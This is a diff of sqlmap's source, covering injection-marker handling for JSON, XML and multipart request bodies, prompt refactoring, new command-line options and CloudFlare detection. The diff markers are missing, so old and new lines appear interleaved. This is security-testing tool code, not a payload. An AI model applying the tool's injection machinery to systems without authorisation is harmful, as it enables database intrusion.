hintNames.append((retVal.split(CUSTOM_INJECTION_MARK_CHAR)[0], match.group("name")))
if kb.customInjectionMark in retVal:
hintNames.append((retVal.split(kb.customInjectionMark)[0], match.group("name")))
return retVal
if kb.processUserMarks is None and CUSTOM_INJECTION_MARK_CHAR in conf.data:
message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR
if kb.processUserMarks is None and kb.customInjectionMark in conf.data:
message = "custom injection marker ('%s') found in option " % kb.customInjectionMark
message += "'--data'. Do you want to process it? [Y/n/q] "
test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"):
choice = readInput(message, default='Y').upper()
if choice == 'Q':
raise SqlmapUserQuitException
else:
kb.processUserMarks = not test or test[0] not in ("n", "N")
kb.processUserMarks = choice == 'Y'
if kb.processUserMarks:
kb.testOnlyCustom = True
if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
if re.search(JSON_RECOGNITION_REGEX, conf.data):
message = "JSON data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"):
raise SqlmapUserQuitException
elif test[0] not in ("n", "N"):
if re.search(JSON_RECOGNITION_REGEX, conf.data):
message = "JSON data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y').upper()
if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'Y':
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data)
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % kb.customInjectionMark), conf.data)
match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
_ = match.group(2)
_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _)
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _)
_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % kb.customInjectionMark, _)
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % kb.customInjectionMark, _)
conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
kb.postHint = POST_HINT.JSON
elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
message = "JSON-like data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"):
raise SqlmapUserQuitException
elif test[0] not in ("n", "N"):
kb.postHint = POST_HINT.JSON
elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
message = "JSON-like data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y').upper()
if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'Y':
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
kb.postHint = POST_HINT.JSON_LIKE
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % kb.customInjectionMark), conf.data)
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % kb.customInjectionMark), conf.data)
elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
message = "Array-like data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"):
raise SqlmapUserQuitException
elif test[0] not in ("n", "N"):
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
kb.postHint = POST_HINT.ARRAY_LIKE
kb.postHint = POST_HINT.JSON_LIKE
elif re.search(XML_RECOGNITION_REGEX, conf.data):
message = "SOAP/XML data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"):
raise SqlmapUserQuitException
elif test[0] not in ("n", "N"):
elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
message = "Array-like data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y').upper()
if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'Y':
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % kb.customInjectionMark, conf.data)
kb.postHint = POST_HINT.ARRAY_LIKE
elif re.search(XML_RECOGNITION_REGEX, conf.data):
message = "SOAP/XML data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y').upper()
if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'Y':
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r"(<(?P<name>[^>]+)( [^<]*)?>)([^<]+)(</\2)", functools.partial(process, repl=r"\g<1>\g<4>%s\g<5>" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
conf.data = re.sub(r"(<(?P<name>[^>]+)( [^<]*)?>)([^<]+)(</\2)", functools.partial(process, repl=r"\g<1>\g<4>%s\g<5>" % kb.customInjectionMark), conf.data)
elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
message = "Multipart-like data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"):
raise SqlmapUserQuitException
elif test[0] not in ("n", "N"):
kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML
elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data):
message = "Multipart-like data found in %s data. " % conf.method
message += "Do you want to process it? [Y/n/q] "
choice = readInput(message, default='Y').upper()
if choice == 'Q':
raise SqlmapUserQuitException
elif choice == 'Y':
if not (kb.processUserMarks and kb.customInjectionMark in conf.data):
conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data)
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
conf.data = re.sub(r"(?si)((Content-Disposition[^\n]+?name\s*=\s*[\"'](?P<name>[^\n]+?)[\"']).+?)(((\r)?\n)+--)", functools.partial(process, repl=r"\g<1>%s\g<4>" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
kb.postHint = POST_HINT.MULTIPART
conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER)
conf.data = re.sub(r"(?si)((Content-Disposition[^\n]+?name\s*=\s*[\"']?(?P<name>[^\"'\r\n]+)[\"']?).+?)(((\r)?\n)+--)", functools.partial(process, repl=r"\g<1>%s\g<4>" % kb.customInjectionMark), conf.data)
kb.postHint = POST_HINT.MULTIPART
if not kb.postHint:
if CUSTOM_INJECTION_MARK_CHAR in conf.data: # later processed
if kb.customInjectionMark in conf.data: # later processed
pass
else:
place = PLACE.POST
@@ -208,12 +225,12 @@ def _setRequestParams():
conf.paramDict[place] = paramDict
testableParameters = True
else:
if CUSTOM_INJECTION_MARK_CHAR not in conf.data: # in case that no usable parameter values has been found
if kb.customInjectionMark not in conf.data: # in case that no usable parameter values has been found
conf.parameters[PLACE.POST] = conf.data
kb.processUserMarks = True if (kb.postHint and CUSTOM_INJECTION_MARK_CHAR in conf.data) else kb.processUserMarks
kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in conf.data) else kb.processUserMarks
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or "") and conf.url.startswith("http"):
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not kb.customInjectionMark in (conf.data or "") and conf.url.startswith("http"):
warnMsg = "you've provided target URL without any GET "
warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') "
warnMsg += "and without providing any POST parameters "
@@ -222,31 +239,32 @@ def _setRequestParams():
message = "do you want to try URI injections "
message += "in the target URL itself? [Y/n/q] "
test = readInput(message, default="Y")
choice = readInput(message, default='Y').upper()
if test and test[0] in ("q", "Q"):
if choice == 'Q':
raise SqlmapUserQuitException
elif not test or test[0] not in ("n", "N"):
conf.url = "%s%s" % (conf.url, CUSTOM_INJECTION_MARK_CHAR)
elif choice == 'Y':
conf.url = "%s%s" % (conf.url, kb.customInjectionMark)
kb.processUserMarks = True
for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, str(conf.httpHeaders))):
_ = re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or "") if place == PLACE.CUSTOM_HEADER else value or ""
if CUSTOM_INJECTION_MARK_CHAR in _:
if kb.customInjectionMark in _:
if kb.processUserMarks is None:
lut = {PLACE.URI: '-u', PLACE.CUSTOM_POST: '--data', PLACE.CUSTOM_HEADER: '--headers/--user-agent/--referer/--cookie'}
message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR
message = "custom injection marker ('%s') found in option " % kb.customInjectionMark
message += "'%s'. Do you want to process it? [Y/n/q] " % lut[place]
test = readInput(message, default="Y")
if test and test[0] in ("q", "Q"):
choice = readInput(message, default='Y').upper()
if choice == 'Q':
raise SqlmapUserQuitException
else:
kb.processUserMarks = not test or test[0] not in ("n", "N")
kb.processUserMarks = choice == 'Y'
if kb.processUserMarks:
kb.testOnlyCustom = True
if "=%s" % CUSTOM_INJECTION_MARK_CHAR in _:
if "=%s" % kb.customInjectionMark in _:
warnMsg = "it seems that you've provided empty parameter value(s) "
warnMsg += "for testing. Please, always use only valid parameter values "
warnMsg += "so sqlmap could be able to run properly"
@@ -278,13 +296,13 @@ def _setRequestParams():
if place == PLACE.CUSTOM_HEADER:
for index in xrange(len(conf.httpHeaders)):
header, value = conf.httpHeaders[index]
if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value):
parts = value.split(CUSTOM_INJECTION_MARK_CHAR)
if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value):
parts = value.split(kb.customInjectionMark)
for i in xrange(len(parts) - 1):
conf.paramDict[place]["%s #%d%s" % (header, i + 1, CUSTOM_INJECTION_MARK_CHAR)] = "%s,%s" % (header, "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts))))
conf.httpHeaders[index] = (header, value.replace(CUSTOM_INJECTION_MARK_CHAR, ""))
conf.paramDict[place]["%s #%d%s" % (header, i + 1, kb.customInjectionMark)] = "%s,%s" % (header, "".join("%s%s" % (parts[j], kb.customInjectionMark if i == j else "") for j in xrange(len(parts))))
conf.httpHeaders[index] = (header, value.replace(kb.customInjectionMark, ""))
else:
parts = value.split(CUSTOM_INJECTION_MARK_CHAR)
parts = value.split(kb.customInjectionMark)
for i in xrange(len(parts) - 1):
name = None
@@ -294,8 +312,8 @@ def _setRequestParams():
name = "%s %s" % (kb.postHint, _)
break
if name is None:
name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)
conf.paramDict[place][name] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts)))
name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, kb.customInjectionMark)
conf.paramDict[place][name] = "".join("%s%s" % (parts[j], kb.customInjectionMark if i == j else "") for j in xrange(len(parts)))
if place == PLACE.URI and PLACE.GET in conf.paramDict:
del conf.paramDict[PLACE.GET]
@@ -307,7 +325,7 @@ def _setRequestParams():
if kb.processUserMarks:
for item in ("url", "data", "agent", "referer", "cookie"):
if conf.get(item):
conf[item] = conf[item].replace(CUSTOM_INJECTION_MARK_CHAR, "")
conf[item] = conf[item].replace(kb.customInjectionMark, "")
# Perform checks on Cookie parameters
if conf.cookie:
@@ -356,8 +374,8 @@ def _setRequestParams():
if condition:
conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders)
conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, CUSTOM_INJECTION_MARK_CHAR)}
conf.httpHeaders = [(header, value.replace(CUSTOM_INJECTION_MARK_CHAR, "")) for header, value in conf.httpHeaders]
conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)}
conf.httpHeaders = [(header, value.replace(kb.customInjectionMark, "")) for header, value in conf.httpHeaders]
testableParameters = True
if not conf.parameters:
@@ -381,9 +399,9 @@ def _setRequestParams():
if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
test = readInput(message, default="N")
if test and test[0] in ("y", "Y"):
conf.csrfToken = parameter
if readInput(message, default='N', boolean=True):
conf.csrfToken = getUnicode(parameter)
break
def _setHashDB():
@@ -418,7 +436,7 @@ def _resumeHashDBValues():
kb.xpCmdshellAvailable = hashDBRetrieve(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE) or kb.xpCmdshellAvailable
kb.errorChunkLength = hashDBRetrieve(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH)
if kb.errorChunkLength and kb.errorChunkLength.isdigit():
if isNumPosStrValue(kb.errorChunkLength):
kb.errorChunkLength = int(kb.errorChunkLength)
else:
kb.errorChunkLength = None
@@ -431,7 +449,7 @@ def _resumeHashDBValues():
if not conf.tech or intersect(conf.tech, injection.data.keys()):
if intersect(conf.tech, injection.data.keys()):
injection.data = dict(filter(lambda (key, item): key in conf.tech, injection.data.items()))
injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.tech)
if injection not in kb.injections:
kb.injections.append(injection)
@@ -471,9 +489,8 @@ def _resumeDBMS():
message += "sqlmap assumes the back-end DBMS is '%s'. " % dbms
message += "Do you really want to force the back-end "
message += "DBMS value? [y/N] "
test = readInput(message, default="N")
if not test or test[0] in ("n", "N"):
if not readInput(message, default='N', boolean=True):
conf.dbms = None
Backend.setDbms(dbms)
Backend.setVersionList(dbmsVersion)
@@ -507,9 +524,8 @@ def _resumeOS():
message += "operating system is %s. " % os
message += "Do you really want to force the back-end DBMS "
message += "OS value? [y/N] "
test = readInput(message, default="N")
if not test or test[0] in ("n", "N"):
if not readInput(message, default='N', boolean=True):
conf.os = os
else:
conf.os = os
@@ -532,7 +548,8 @@ def _setResultsFile():
except (OSError, IOError), ex:
try:
warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex))
conf.resultsFilename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.RESULTS, suffix=".csv")[1]
handle, conf.resultsFilename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.RESULTS, suffix=".csv")
os.close(handle)
conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
warnMsg += "Using temporary file '%s' instead" % conf.resultsFilename
logger.warn(warnMsg)
@@ -654,6 +671,7 @@ def _createTargetDirs():
with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f:
f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding))
if conf.data:
f.write("\n\n%s" % getUnicode(conf.data))
except IOError, ex:

13
lib/core/threads.py
View File

@@ -7,7 +7,6 @@ See the file 'doc/COPYING' for copying permission
import difflib
import random
import thread
import threading
import time
import traceback
@@ -68,7 +67,7 @@ ThreadData = _ThreadData()
def getCurrentThreadUID():
return hash(threading.currentThread())
def readInput(message, default=None):
def readInput(message, default=None, checkBatch=True, boolean=False):
# It will be overwritten by original from lib.core.common
pass
@@ -88,7 +87,7 @@ def getCurrentThreadName():
return threading.current_thread().getName()
def exceptionHandledFunction(threadFunction):
def exceptionHandledFunction(threadFunction, silent=False):
try:
threadFunction()
except KeyboardInterrupt:
@@ -96,8 +95,8 @@ def exceptionHandledFunction(threadFunction):
kb.threadException = True
raise
except Exception, ex:
# thread is just going to be silently killed
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
if not silent:
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
def setDaemon(thread):
# Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation
@@ -151,7 +150,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
try:
thread.start()
except thread.error, ex:
except Exception, ex:
errMsg = "error occurred while starting new thread ('%s')" % ex.message
logger.critical(errMsg)
break
@@ -208,7 +207,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
if lock.locked():
try:
lock.release()
except thread.error:
except:
pass
if conf.get("hashDB"):

35
lib/parse/cmdline.py
View File

@@ -31,7 +31,6 @@ from lib.core.settings import BASIC_HELP_ITEMS
from lib.core.settings import DUMMY_URL
from lib.core.settings import IS_WIN
from lib.core.settings import MAX_HELP_OPTION_LENGTH
from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import VERSION_STRING
from lib.core.shell import autoCompletion
from lib.core.shell import clearHistory
@@ -48,7 +47,8 @@ def cmdLineParser(argv=None):
checkSystemEncoding()
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.stdin.encoding)
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
"\"%s\"" % _ if " " in _ else _)
@@ -321,7 +321,7 @@ def cmdLineParser(argv=None):
detection.add_option("--risk", dest="risk", type="int",
help="Risk of tests to perform (1-3, "
"default %d)" % defaults.level)
"default %d)" % defaults.risk)
detection.add_option("--string", dest="string",
help="String to match when "
@@ -617,9 +617,6 @@ def cmdLineParser(argv=None):
general = OptionGroup(parser, "General", "These options can be used "
"to set some general working parameters")
#general.add_option("-x", dest="xmlFile",
# help="Dump the data into an XML file")
general.add_option("-s", dest="sessionFile",
help="Load session from a stored (.sqlite) file")
@@ -637,6 +634,10 @@ def cmdLineParser(argv=None):
general.add_option("--charset", dest="charset",
help="Force character encoding used for data retrieval")
general.add_option("--check-internet", dest="checkInternet",
action="store_true",
help="Check Internet connection before assessing the target")
general.add_option("--crawl", dest="crawlDepth", type="int",
help="Crawl the website starting from the target URL")
@@ -652,8 +653,7 @@ def cmdLineParser(argv=None):
general.add_option("--eta", dest="eta",
action="store_true",
help="Display for each output the "
"estimated time of arrival")
help="Display for each output the estimated time of arrival")
general.add_option("--flush-session", dest="flushSession",
action="store_true",
@@ -667,6 +667,9 @@ def cmdLineParser(argv=None):
action="store_true",
help="Ignore query results stored in session file")
general.add_option("--har", dest="harFile",
help="Log all HTTP traffic into a HAR file")
general.add_option("--hex", dest="hexConvert",
action="store_true",
help="Use DBMS hex function(s) for data retrieval")
@@ -770,9 +773,6 @@ def cmdLineParser(argv=None):
parser.add_option("--murphy-rate", dest="murphyRate", type="int",
help=SUPPRESS_HELP)
parser.add_option("--pickled-options", dest="pickledOptions",
help=SUPPRESS_HELP)
parser.add_option("--disable-precon", dest="disablePrecon", action="store_true",
help=SUPPRESS_HELP)
@@ -799,6 +799,14 @@ def cmdLineParser(argv=None):
parser.add_option("--run-case", dest="runCase", help=SUPPRESS_HELP)
# API options
parser.add_option("--api", dest="api", action="store_true",
help=SUPPRESS_HELP)
parser.add_option("--taskid", dest="taskid", help=SUPPRESS_HELP)
parser.add_option("--database", dest="database", help=SUPPRESS_HELP)
parser.add_option_group(target)
parser.add_option_group(request)
parser.add_option_group(optimization)
@@ -839,8 +847,9 @@ def cmdLineParser(argv=None):
advancedHelp = True
extraHeaders = []
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
for arg in argv:
_.append(getUnicode(arg, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING))
_.append(getUnicode(arg, encoding=sys.stdin.encoding))
argv = _
checkDeprecatedOptions(argv)
@@ -963,7 +972,7 @@ def cmdLineParser(argv=None):
if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \
args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
args.purgeOutput, args.pickledOptions, args.sitemapUrl)):
args.purgeOutput, args.sitemapUrl)):
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
errMsg += "use -h for basic or -hh for advanced help\n"
parser.error(errMsg)

3
lib/parse/sitemap.py
View File

@@ -41,8 +41,7 @@ def parseSitemap(url, retVal=None):
if url.endswith(".xml") and "sitemap" in url.lower():
if kb.followSitemapRecursion is None:
message = "sitemap recursion detected. Do you want to follow? [y/N] "
test = readInput(message, default="N")
kb.followSitemapRecursion = test[0] in ("y", "Y")
kb.followSitemapRecursion = readInput(message, default='N', boolean=True)
if kb.followSitemapRecursion:
parseSitemap(url, retVal)
else:

29
lib/request/basic.py
View File

@@ -95,7 +95,7 @@ def forgeHeaders(items=None):
if cookie.domain_specified and not conf.hostname.endswith(cookie.domain):
continue
if ("%s=" % getUnicode(cookie.name)) in headers[HTTP_HEADER.COOKIE]:
if ("%s=" % getUnicode(cookie.name)) in getUnicode(headers[HTTP_HEADER.COOKIE]):
if conf.loadCookies:
conf.httpHeaders = filter(None, ((item if item[0] != HTTP_HEADER.COOKIE else None) for item in conf.httpHeaders))
elif kb.mergeCookies is None:
@@ -103,8 +103,8 @@ def forgeHeaders(items=None):
message += "The target URL provided its own cookies within "
message += "the HTTP %s header which intersect with yours. " % HTTP_HEADER.SET_COOKIE
message += "Do you want to merge them in further requests? [Y/n] "
_ = readInput(message, default="Y")
kb.mergeCookies = not _ or _[0] in ("y", "Y")
kb.mergeCookies = readInput(message, default='Y', boolean=True)
if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
_ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), x)
@@ -123,7 +123,7 @@ def forgeHeaders(items=None):
return headers
def parseResponse(page, headers):
def parseResponse(page, headers, status=None):
"""
@param page: the page to parse to feed the knowledge base htmlFp
(back-end DBMS fingerprint based upon DBMS error messages return
@@ -135,7 +135,7 @@ def parseResponse(page, headers):
headersParser(headers)
if page:
htmlParser(page)
htmlParser(page if not status else "%s\n\n%s" % (status, page))
@cachedmethod
def checkCharEncoding(encoding, warn=True):
@@ -155,7 +155,7 @@ def checkCharEncoding(encoding, warn=True):
return encoding
# Reference: http://www.destructor.de/charsets/index.htm
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
for delimiter in (';', ',', '('):
if delimiter in encoding:
@@ -204,7 +204,7 @@ def checkCharEncoding(encoding, warn=True):
# Reference: http://philip.html5.org/data/charsets-2.html
if encoding in translate:
encoding = translate[encoding]
elif encoding in ("null", "{charset}", "*") or not re.search(r"\w", encoding):
elif encoding in ("null", "{charset}", "charset", "*") or not re.search(r"\w", encoding):
return None
# Reference: http://www.iana.org/assignments/character-sets
@@ -340,12 +340,12 @@ def decodePage(page, contentEncoding, contentType):
return page
def processResponse(page, responseHeaders):
def processResponse(page, responseHeaders, status=None):
kb.processResponseCounter += 1
page = page or ""
parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None)
parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None, status)
if not kb.tableFrom and Backend.getIdentifiedDbms() in (DBMS.ACCESS,):
kb.tableFrom = extractRegexResult(SELECT_FROM_TABLE_REGEX, page)
@@ -368,11 +368,20 @@ def processResponse(page, responseHeaders):
continue
else:
msg = "do you want to automatically adjust the value of '%s'? [y/N]" % name
if readInput(msg, default='N').strip().upper() != 'Y':
if not readInput(msg, default='N', boolean=True):
continue
conf.paramDict[PLACE.POST][name] = value
conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % re.escape(value), conf.parameters[PLACE.POST])
if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""):
kb.browserVerification = True
warnMsg = "potential browser verification protection mechanism detected"
if re.search(r"(?i)CloudFlare", page):
warnMsg += " (CloudFlare)"
singleTimeWarnMessage(warnMsg)
if not kb.captchaDetected and re.search(r"(?i)captcha", page or ""):
for match in re.finditer(r"(?si)<form.+?</form>", page):
if re.search(r"(?i)captcha", match.group(0)):

136
lib/request/connect.py
View File

@@ -81,7 +81,6 @@ from lib.core.exception import SqlmapTokenException
from lib.core.exception import SqlmapValueException
from lib.core.settings import ASTERISK_MARKER
from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_CONTENT_TYPE
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
@@ -105,6 +104,7 @@ from lib.core.settings import RANDOM_STRING_MARKER
from lib.core.settings import REPLACEMENT_MARKER
from lib.core.settings import TEXT_CONTENT_TYPE_REGEX
from lib.core.settings import UNENCODED_ORIGINAL_VALUE
from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import URI_HTTP_HEADER
from lib.core.settings import WARN_TIME_STDEV
from lib.request.basic import decodePage
@@ -222,6 +222,8 @@ class Connect(object):
the target URL page content
"""
start = time.time()
if isinstance(conf.delay, (int, float)) and conf.delay > 0:
time.sleep(conf.delay)
@@ -256,6 +258,7 @@ class Connect(object):
refreshing = kwargs.get("refreshing", False)
retrying = kwargs.get("retrying", False)
crawling = kwargs.get("crawling", False)
checking = kwargs.get("checking", False)
skipRead = kwargs.get("skipRead", False)
if multipart:
@@ -277,13 +280,17 @@ class Connect(object):
# url splitted with space char while urlencoding it in the later phase
url = url.replace(" ", "%20")
if "://" not in url:
url = "http://%s" % url
conn = None
code = None
page = None
code = None
status = None
_ = urlparse.urlsplit(url)
requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET))
requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling)) else url
